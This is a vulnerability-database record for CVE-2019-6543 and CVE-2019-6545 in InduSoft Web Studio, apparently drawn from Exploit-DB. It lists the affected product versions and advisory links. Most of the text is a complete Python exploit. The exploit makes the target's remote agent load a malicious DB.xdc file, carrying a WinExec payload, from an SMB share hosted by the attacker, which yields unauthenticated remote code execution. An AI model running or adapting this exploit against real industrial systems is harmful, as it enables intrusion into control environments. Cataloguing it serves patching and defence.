ID
VAR-E-201902-0117
CVE
| cve_id: | CVE-2019-6543 | Trust: 1.8 |
| cve_id: | CVE-2019-6545 | Trust: 1.8 |
EDB ID
46342
TITLE
Indusoft Web Studio 8.1 SP2 - Remote Code Execution - Multiple remote Exploit
Trust: 0.6
DESCRIPTION
Indusoft Web Studio 8.1 SP2 - Remote Code Execution. CVE-2019-6545CVE-2019-6543 . remote exploit for Multiple platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | indusoft | model: | web studio sp2 | scope: | eq | version: | 8.1 | Trust: 2.1 |
| vendor: | schneider electric | model: | intouch edge hmi | scope: | eq | version: | 2017 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp2 | scope: | eq | version: | 8.1 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp1 | scope: | eq | version: | 8.1 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio | scope: | eq | version: | 8.1 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp2 patch | scope: | eq | version: | 8.01 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp2 | scope: | eq | version: | 8.0 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio patch | scope: | eq | version: | 7.1.3.55 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp patch | scope: | eq | version: | 7.1.3.434 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio | scope: | eq | version: | 7.1.3.4 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio | scope: | eq | version: | 7.1.3.2 | Trust: 0.3 |
| vendor: | schneider electric | model: | indusoft web studio sp3 | scope: | ne | version: | 8.1 | Trust: 0.3 |
EXPLOIT
##
# Exploit Title: Indusoft Web Studio Unauthenticated RCE
# Date: 02/04/2019
# Exploit Author: Jacob Baines
# Vendor Homepage: http://www.indusoft.com/
# Software http://www.indusoft.com/Products-Downloads/Download-Library
# Version: 8.1 SP2 and below
# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app
# CVE : CVE-2019-6545 CVE-2019-6543
# Advisory:
https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01
# Advisory: https://www.tenable.com/security/research/tra-2019-04
##
import argparse
import threading
import socket
from struct import *
import time
import sys
from impacket import smbserver
##
# The SMB Server function. Runs on its own thread.
# @param lip the listening IP address
##
def smb_server(lip):
server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
server.addShare('LOLWAT', '.', '')
server.setSMBChallenge('')
server.setLogFile('/dev/null')
server.start()
##
# Converts a normal string to a utf 16 with a length field.
# @param s the string to convert
##
def wstr(s):
slen = len(s)
s = s.encode('utf_16_le')
out = '\xff\xfe\xff'
if slen < 0xff:
out += pack('<B', slen) + s
elif slen < 0xffff:
out += '\xff' + pack('<H', slen) + s
else:
out += '\xff\xff\xff' + pack('<L', slen) + s
return out
if __name__ == '__main__':
top_parser = argparse.ArgumentParser(description='test')
top_parser.add_argument('--cip', action="store", dest="cip",
required=True, help="The IPv4 address to connect to")
top_parser.add_argument('--cport', action="store", dest="cport",
type=int, help="The port to connect to", default="1234")
top_parser.add_argument('--lip', action="store", dest="lip",
required=True, help="The address to connect back to")
args = top_parser.parse_args()
# Connect to the remote agent
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Attempting connection to " + args.cip + ":" + str(args.cport)
sock.settimeout(15)
sock.connect((args.cip, args.cport))
print "[+] Connected!"
# spin up the SMB server thread
print "[+] Spinning up the SMB Server"
smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
smb_thread.daemon = True;
smb_thread.start()
# drop the xdc file
print "[+] Creating the DB.xdc file"
xdc = open("./DB.xdc", "w+")
xdc.write(
"<?xml version=\"1.0\"?>\n"
"<Connection>\n"
"\t<ConnectionString>{WinExec(\"calc.exe\")}</ConnectionString>\n"
"\t<User></User>\n"
"\t<TimeOut>2</TimeOut>\n"
"\t<LongTimeOut>5</LongTimeOut>\n"
"\t<HostName>127.0.0.1</HostName>\n"
"\t<TCPPort>3997</TCPPort>"
"\t<Flags>0</Flags>\n"
"\t<RetryInterval>120</RetryInterval>\n"
"</Connection>\n")
xdc.close()
print "[+] Sending the connection init message"
init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03"
sock.sendall(init_conn)
resp = sock.recv(1024)
print '<- ' + resp
# do a basic validation of the response
if (len(resp) > 0 and resp[len(resp) - 1] == '\x03'):
print "[+] Received an init response"
else:
print "[-] Invalid init response. Exiting..."
sock.close()
sys.exit(0)
# Craft command 66
cmd = wstr('CO') # options: EX, CO, CF, CC
cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB') # file to load
cmd += wstr('')
cmd += wstr('')
cmd += wstr('')
cmd += wstr('lolwat')
cmd += pack('<L', 0x3e80)
cmd += pack('<L', 0)
cmd += pack('<L', 100)
cmd = '\x02\x42' + cmd + '\x03'
# Send it to the agent
print "[+] Sending command 66"
sock.sendall(cmd)
print "[+] Grabbing the command response"
resp = sock.recv(1024)
print '<- ' + resp
if resp.find("Format of the initialization string does not conform to
specification starting at index 0".encode('utf_16_le')) != -1:
print '[+] Success! We received the expected error message.'
else:
print '[-] Unexpected error message. Something went wrong.'
print '[+] Disconnecting'
sock.close()
print '[+] Wait while the agent disconnects from the SMB server...'
sys.exit(0)
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Code Execution
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
CREDITS
Jacob Baines
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-19-036-01 | Trust: 2.4 |
| db: | TENABLE | id: | TRA-2019-04 | Trust: 2.1 |
| db: | EXPLOIT-DB | id: | 46342 | Trust: 1.9 |
| db: | NVD | id: | CVE-2019-6543 | Trust: 1.8 |
| db: | NVD | id: | CVE-2019-6545 | Trust: 1.8 |
| db: | EDBNET | id: | 100973 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 151602 | Trust: 0.5 |
| db: | BID | id: | 107144 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-6543 | Trust: 1.5 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-6545 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/46342/ | Trust: 0.6 |
| url: | https://ics-cert.us-cert.gov/advisories/icsa-19-036-01 | Trust: 0.3 |
| url: | https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/securitybulletin_lfsec133.pdf?hslang=en | Trust: 0.3 |
| url: | https://industrial-software.com/training-support/downloads-by-product/intouch-machine-edition | Trust: 0.3 |
| url: | https://www.exploit-db.com/exploits/46342 | Trust: 0.3 |
| url: | http://www.indusoft.com/indusoftart.php?catid=1&name=iws/webstudio | Trust: 0.3 |
| url: | http://www.indusoft.com/products-downloads | Trust: 0.3 |
| url: | http://www.indusoft.com/products-downloads/download-library/current-release-notes | Trust: 0.3 |
SOURCES
| db: | BID | id: | 107144 |
| db: | PACKETSTORM | id: | 151602 |
| db: | EXPLOIT-DB | id: | 46342 |
| db: | EDBNET | id: | 100973 |
LAST UPDATE DATE
2022-07-27T09:32:12.457000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 107144 | date: | 2019-02-05T00:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 107144 | date: | 2019-02-05T00:00:00 |
| db: | PACKETSTORM | id: | 151602 | date: | 2019-02-11T16:13:52 |
| db: | EXPLOIT-DB | id: | 46342 | date: | 2019-02-11T00:00:00 |
| db: | EDBNET | id: | 100973 | date: | 2019-02-11T00:00:00 |